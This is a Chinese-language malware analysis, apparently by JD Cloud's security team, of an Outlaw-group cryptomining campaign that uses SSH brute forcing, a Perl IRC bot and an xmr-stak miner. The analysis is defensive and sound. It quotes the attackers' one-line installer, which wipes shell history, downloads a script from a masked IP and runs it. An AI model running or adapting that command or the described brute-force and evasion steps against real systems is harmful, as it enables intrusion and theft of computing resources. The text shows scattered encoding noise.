【原標題:黃金礦工貨幣或將時代終結 形態(tài)決定未來價格走勢】財金網消息 2009年,比特幣橫空出世����。得益于去中心化的貨幣機制��,比特幣受到許多行業(yè)的青睞��,其交易價格也是一路走高����。由于比特幣的成功��,許多基于區(qū)塊鏈技術的數(shù)字貨幣紛紛問世���,例如以太幣����,門羅幣����,萊特幣等。
這類數(shù)字貨幣并非由特定的貨幣發(fā)行機構發(fā)行�,而是依據(jù)特定算法通過大量運算所得。而完成大量運算的工具就是挖礦機程序���。
power by | 京東云安全能力與服務團隊
圖片來源:BBC NEWS
挖礦機程序運用計算機強大的運算力進行大量運算�,由此獲取數(shù)字貨幣。由于硬件性能的限制�,數(shù)字貨幣玩家需要大量計算機進行運算以獲得一定數(shù)量的數(shù)字貨幣,因此����,一些不法分子通過各種手段將挖礦機程序植入受害者的計算機中��,利用受害者計算機的運算力進行挖礦����,從而獲取利益。入侵者只需要準備主服務器�,即master服務器,將獲得服務器管理員權限以后的被入侵服務器轉化為從屬服務器�����,這樣就形成了一個具有超大計算能力的分布式挖礦集群���,大大提高了他的收益�。這類在用戶不知情的情況下植入用戶計算機進行挖礦的挖礦機程序稱為挖礦木馬�。
挖礦木馬最早出現(xiàn)于2013年,2017年開始大量傳播�����。挖礦木馬傳播者瘋狂入侵企業(yè)網絡,利用企業(yè)IT資源實現(xiàn)零成本挖礦���。而暗網平臺大量存在的非法交易�����,更是數(shù)字加密幣持續(xù)火爆的土壤���。根據(jù)“卡巴斯基2018年度安全公告”中可以看出,挖礦木馬已經成為服務器遭遇的最嚴重的安全威脅之一�����。
圖片來源
Kaspersky Security Bulletin 2018. Story of the year: miners
為了更好地讓大家了解如何防范“挖礦木馬”����,今天我們給大家整理了一個典型的排查“挖礦木馬”入侵的流程分析。
背景
發(fā)現(xiàn)近期云中部分主機出現(xiàn)挖礦行為����,對發(fā)現(xiàn)的礦機及感染過程做出分析,此礦機目前比較活躍���,同時腳本應該在持續(xù)更新中���,并在互聯(lián)網中進行持續(xù)活躍的感染�����,使用的是Outlaw組織的工具,懷疑此惡意感染礦機程序非個人行為為組織性行為��,并試圖隱藏真正身份��。
攻擊矢量分析
01
感染過程
1 . C2服務器通過得到的用戶名與密碼登錄受害云主機���;
2 . 受害云主機從C2服務器遠端下載perl腳本���;
3 . 受害云主機安裝perl惡意程序與C2進行持久化通信;
4 . 通過IRC通信下載相關礦機程序及爆破程序并進行啟動運行��;
5 . 受害云主機根據(jù)下載的ip地址和密碼表對云內部及外部主機進行暴力破解���;
6 . 如果破解成功返回ip及口令結果���;
7 . 通過IRC通信將ip及口令返回給C2服務器����;
8 . 重復1~7過程進行多實例的感染���。
02
感染過程相關使用樣本
Hello: 遠端C2服務器到本地運行測試����,判斷環(huán)境是否符合運行條件
Rsync/t:perl可執(zhí)文件�,執(zhí)行成功后與C2服務器建立IRC通信
Abc: 主運行shell腳本,自動化下載�����、安裝并啟動所有程序
Dota.tar.gz:包含礦機�����、爆破和IRC通信程序的整體壓縮包
Lan.sh: 啟動迷你程序(單獨的礦機壓縮包和單獨的爆破程序壓縮包)的shell腳本��,自動化下載����、安裝運行
Sslm.tar.gz:包含下載礦機執(zhí)行腳本及爆破程序執(zhí)行的腳本和爆破程序文件
Minloc.sh:礦機下載及運行的腳本
Ml.tar.gz:礦機運行程序壓縮包
03
程序執(zhí)行過程
受害主機自動化安裝流程圖
完整程序運行流程圖
系統(tǒng)進程
輕量級安裝程序運行流程圖
完整惡意程序分析
01
文件結構
包括3個部分:
a:XMR挖礦程序
b:IRC與C2通信
c:SSH爆破程序
02
惡意程序執(zhí)行過程分析
XMR挖礦程序分析
1、礦機簡介:
使用的開源xmr-stak礦機,一個高度可配置的Monero(XMR)礦機�。
Git上開源地址:https://github.com/fireice-uk/xmr-stak
2、安裝過程:
通過從C2服務器中下載shell腳本執(zhí)行���,進行礦機下載和運行���,此礦機已經是編譯完成的二進制文件,直接可以在對應的系統(tǒng)中運行����,無需安裝編譯環(huán)境及依賴。
Abc執(zhí)行腳本中關于礦機部分:
下載解壓后����,執(zhí)行init2腳本:運行a目錄下a腳本�,同時添加定時任務。
a目錄下a腳本:生成upd腳本���,賦予權限�����,執(zhí)行upd腳本
Run腳本:使用下載的依賴lib庫��,按照系統(tǒng)位數(shù)運行對應的礦機可執(zhí)行文件�����,此處文件名設置為了混淆和隱藏自身運行進程���。
03
礦池分析
由于此礦機具有高可配置性�,所以礦機加載自行下載下來的配置文件config.txt與pools.txt
根據(jù)pools.txt文件��,發(fā)現(xiàn)礦池地址和錢包地址:
進一步確認表明池地址目前已關閉�,公共池和哈希值沒有更多信息站點。
此池配置指向荷蘭的VPS提供商(服務器名稱server12.offensiveservers.com�,路由到AS50673 SERVERIUS - AS(NL))。VPS的被動DNS數(shù)據(jù)顯示它托管了許多域�,看起來主機像是一個游戲服務器主機。懷疑這些活動參與者可能已經在這個提供商建立他們自己私有的礦業(yè)池基礎設施�。
IRC與C2通信分析
通過安裝使用perl語言的rsync或t可執(zhí)行文件與C2服務器進行通信,目前的感染樣本全部為黑客組織Outlaw使用的基于Perl Shellbot構建的IRC bot的變種�。
01
安裝過程
unset HISTFILE && rm -rf /tmp/t* && cd /tmp && wget -q x.x.x.x/t && chmod +x && perl t
或unset HISTFILE && rm -rf /tmp/* && cd /tmp && wget -q x.x.x.x/rsync && chmod +x && perl rsync
02
樣本分析
樣本采用了perl的代碼(916行)混淆方式,通過Uuencode進行簡單的編碼混淆�,目的主要為了避開特征檢測等反病毒設備及監(jiān)控設備
原始樣本:
perl反混淆后,主要進行通信的函數(shù):
03
執(zhí)行過程
1��、連接C2服務器:到C2的連接嘗試在感染后就出現(xiàn)了�,并且是持續(xù)的。如果連接斷開,就重新連接:
2����、感染后的TCP通信流:
通信流量說明惡意軟件會加入僵尸機的IRC信道,并分配給昵稱和服務器配置信息�����。修改DNS設置能夠確認有真實的攻擊目標參與其中�����。然后用PING/PONG通信來保持通信信道開啟��。IRC服務器會發(fā)送PING消息��,需要PONG消息響應來預防連接斷開�。
3�、后續(xù)動作:
在目標系統(tǒng)上運行后,IRC信道的管理員會發(fā)送不同的命令給被感染的主機�����。列表中含有執(zhí)行端口掃描����、DDOS�����、文件下載��、信息獲取�����、發(fā)送操作系統(tǒng)信息和運行進程列表的命令�����。
IRC相關的函數(shù)使用了join, part, uejoin, op, deop, voice, devoice, nick, msg, quit, uaw, die等��。
SSH爆破分析
01
啟動爆破流程
Start ? Aptitude ? run ? go ? tsm ? finish
02
Start執(zhí)行腳本
指定路徑和將shell腳本輸出到指定文件運行
03
Aptitude執(zhí)行腳本
切換到c目錄下執(zhí)行run腳本
04
Run執(zhí)行腳本
先停掉已經運行腳本�,隨機時間執(zhí)行go腳本
05
go執(zhí)行腳本
首先清理已有文件���,然后通過隨機數(shù)進行判斷去服務器獲取爆破使用的a(ip地址列表)和b(密碼列表)����,使用隨機數(shù)方式主要還是為了逃避一些檢測和監(jiān)控�,下載完畢后重命名為ip和p��,最后執(zhí)行tsm爆破程序使用密碼列表對ip地址列表進行爆破���,90分鐘超時,如果未正常執(zhí)行完畢將強制KILL程序����,刪除所有相關文件。
06
TSM程序
使用的是Outlaw組織之前使用過的haiduc工具��。haiduc工具集變種用來暴力破解運行SSH服務的有漏洞的主機��。
包含在32位與64位上分別能運行的二進制程序����,同時帶有供其使用的lib的so庫,保證程序的正常運行����。
營業(yè)執(zhí)照公示信息